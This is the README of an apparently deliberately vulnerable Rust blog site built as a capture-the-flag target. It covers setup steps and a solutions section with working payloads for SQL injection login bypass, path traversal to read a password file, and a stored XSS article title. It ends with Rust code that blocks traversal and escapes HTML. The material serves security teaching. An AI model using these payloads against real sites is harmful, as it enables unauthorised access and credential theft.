
isep_a3-vulnerable_dummy_website's Introduction

Vulnerable dummy website

This is a dummy website meant to be a CTF target.

CTF scenario

A friend of yours who is learning web development asked you to help him test his simple blog website. You discover that there are security vulnerabilities in his website.

To complete the challenge, you have to:

  1. Log in as admin (easy)
  2. Get the admin password (medium)
  3. (Requires 2) Publish an article that pops something up when a user visits the home page (hard)

Installation

Prerequisites

  • A Rust (minimum edition 2021) toolchain
  • A tool to manage SQLite databases

Steps

  1. Clone the repository
  2. Create a passwd file and fill it with some password (make sure there is no whitespace after the text)
  3. Create a SQLite database in the server directory (either name it db.sqlite or change the name in Rocket.toml), and run the following query on it:
CREATE TABLE "users" (
  "username"  TEXT  NOT NULL UNIQUE,
  "password"  TEXT  NOT NULL,
  PRIMARY KEY("username")
)
  4. Start the web server with cargo run --release
  5. Go to http://localhost:8080/sign and register the admin user with the same password as in passwd
  6. Log out and you are ready to go!

CTF solutions

โš ๏ธ This section contains the solutions to the challenge. Take care not to read it if you want to do the challenge yourself !

1. Log in as admin

The login form is vulnerable to SQL injection. So you can log in with something like:

Username: admin';--
Password: admin

2. Get the admin password

The admin password is located in the passwd file.

The GET /article?file endpoint is vulnerable to path traversal. So you can get the file by requesting:

GET /article?file=../../passwd

3. Publish an article that pops something up when a user visits the home page

The POST /api/article endpoint is vulnerable to DOM injection (the article title is inserted into the home page without escaping), but the request requires Basic authentication. So you can create an article by requesting:

POST /api/article
Authorization: Basic <auth>
Content-Type: application/json

{
  "file": "vulnerable",
  "title": "<iframe src=\"javascript:alert('I am vulnerable')\">",
  "content": ""
}

where <auth> is the base64 representation of the string admin:<passwd> (<passwd> is the text you obtained in the previous task).

You can convert a string into base64 using JavaScript's btoa function for example.

Now, whenever a user goes to the home page, an alert saying I am vulnerable pops up.
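The two server-side checks that would close tasks 2 and 3, as an added example that is not part of this project's code: rejecting any file parameter that is not a single plain file name, and escaping the article title before it reaches the home page. The articles directory name and the function names are assumptions, not taken from the repository.

```rust
use std::path::{Component, Path, PathBuf};

/// Resolve the `file` query parameter of GET /article against the articles
/// directory. Only a single normal component is accepted, so "../../passwd",
/// "/etc/passwd" and "a/../b" are all rejected before touching the filesystem.
/// (Added example; `base` such as "articles" is an assumed directory name.)
pub fn safe_article_path(base: &Path, file: &str) -> Option<PathBuf> {
    let mut components = Path::new(file).components();
    let name = match components.next() {
        Some(Component::Normal(name)) => name,
        _ => return None, // empty, "..", "/", "." or a drive prefix
    };
    if components.next().is_some() {
        return None; // more than one component, e.g. "sub/dir" or "a/../b"
    }
    Some(base.join(name))
}

/// Escape the characters that let an article title break out of text
/// context when it is inserted into the home page's HTML.
pub fn escape_html(input: &str) -> String {
    let mut out = String::with_capacity(input.len());
    for c in input.chars() {
        match c {
            '&' => out.push_str("&amp;"),
            '<' => out.push_str("&lt;"),
            '>' => out.push_str("&gt;"),
            '"' => out.push_str("&quot;"),
            '\'' => out.push_str("&#39;"),
            _ => out.push(c),
        }
    }
    out
}

fn main() {
    let base = Path::new("articles");
    println!("{:?}", safe_article_path(base, "vulnerable"));     // Some("articles/vulnerable")
    println!("{:?}", safe_article_path(base, "../../passwd"));   // None
    println!("{}", escape_html("<iframe src=\"javascript:alert('I am vulnerable')\">"));
}
```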
